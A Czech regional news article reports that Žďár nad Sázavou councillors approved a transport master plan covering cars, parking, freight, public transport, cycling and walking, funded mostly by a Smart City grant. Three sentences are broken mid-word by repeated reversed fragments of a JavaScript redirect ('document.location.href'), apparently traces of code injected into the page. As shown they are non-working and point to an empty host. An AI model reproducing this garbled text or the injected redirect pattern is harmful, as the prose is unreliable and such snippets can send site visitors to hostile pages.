Rainbow page separator

Generel dopravy dostal zelenou, schválili ho zastupitelé

Pondělí, 10. ledna 2022

Žďár nad Sázavou / Takzvaný generel dopravy koncem uplynulého roku schválili žďárští zastupitelé. Dokument má pro příští léta doporučit, jak ve Žďáře postupovat v souvislosti s au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobilovou dopravou a parkováním, nákladní dopravou, městskou hromadnou dopravou a cyklistickou i pěší dopravou, aby bylo spokojeno co nejvíce obyvatel.
V předchozích letech rovněž proběhly výzkumy i setkání občany, kde byly prezen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];továny změny v zatížení jednotlivých komunikací ještě před tím, než budou provedeny. Součástí digitálního modelu dopravy je mimo jiné i pasport všech komunikací včetně cyklostezek a cyklotras a současně také vedení linek městské hromadné dopravy (MHD). Při tvorbě generelu bylo využi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to například sčítání dopravy, ale i dotazníkové šetření či on-line průzkumy mezi obyvateli.
Zpracování generelu dopravy, který je k dispozici na webu žďárské radnice, vyšlo na 2,4 milionu korun, z čehož pětadevadesát procent bylo uhrazeno prostřednictvím dotace z projektu Smart City.